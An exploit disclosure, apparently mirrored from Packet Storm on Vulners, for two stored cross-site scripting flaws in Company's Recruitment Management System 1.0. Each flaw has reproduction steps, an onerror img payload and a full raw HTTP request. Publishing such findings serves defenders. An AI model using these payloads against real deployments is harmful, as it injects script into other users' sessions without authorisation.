Vulners
Lucene search
Company's Recruitment Management System 1.0 Cross Site Scripting
🗓️ 18 Oct 2021 00:00:00Reported by Aniket DeshmaneType 
packetstorm🔗 packetstormsecurity.com👁 307 Views
`# Exploit Title: Company's Recruitment Management System 1.0. - 'title' Stored Cross-Site Scripting (XSS)
# Date: 17-10-2021
# Exploit Author: Aniket Deshmane
# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip
# Version: 1
# Tested on: Windows 10,XAMPP
Steps to Reproduce:
1)Navigate to http://127.0.0.1/employment_application & Login with staff account .
2) Navigate to vacancies tab
3) Click on Add new .
4)Add Payload
"><img src=x onerror=alert(1)>
in Vacancy Title field.
5)Click on Save and you are done. It's gonna be triggered when anyone
visits the application.
Request:-
POST /employment_application/Actions.php?a=save_vacancy HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------15502044322641666722659366422
Content-Length: 931
Origin: http://127.0.0.1
DNT: 1
Connection: close
Cookie: PHPSESSID=e00mbu2u5cojpsh5jkaj9pjlfc
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Cache-Control: no-transform
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="id"
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="title"
"><img src=x onerror=alert(1)>
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="designation_id"
1
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="slots"
1
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="status"
1
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="description"
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream
-----------------------------15502044322641666722659366422--
---------------------
# Exploit Title: Company's Recruitment Management System 1.0 - 'description' Stored Cross-Site Scripting (XSS)
# Date: 18-10-2021
# Exploit Author: Aniket Anil Deshmane
# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip
# Version: 1
# Tested on: Windows 10,XAMPP
Step to reproduce:-
1)Login with staff account & Navigate to Vacancies tab.
2)Click on add new vacancies .Put any random information on other field except description & go to the description window .
3)In the description field select insert link .
5) In Text to display the field add the following payload .
"><img src=x onerror=alert(1)>
*6)Click on save & you are done.It's gonna be triggered when some one open
vacancies details *
Request:-
POST /employment_application/Actions.php?a=save_vacancy HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0)
Gecko/20100101 Firefox/93.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------156186133432167175201476666002
Content-Length: 1012
Origin: http://127.0.0.1
DNT: 1
Connection: close
Referer: http://127.0.0.1/employment_application/admin/?page=vacancies
Cookie: PHPSESSID=ah0lpri38n5c4ke3idhbkaabfa
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="id"
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="title"
Test1ee
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="designation_id"
4
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="slots"
1
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="status"
1
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="description"
<p><br><a href="http://google.com" target="_blank">"><img src="x"
onerror="alert(1)"></a></p>
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream
-----------------------------156186133432167175201476666002--
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Oct 2021 00:00Current
7.4High risk
Vulners AI Score7.4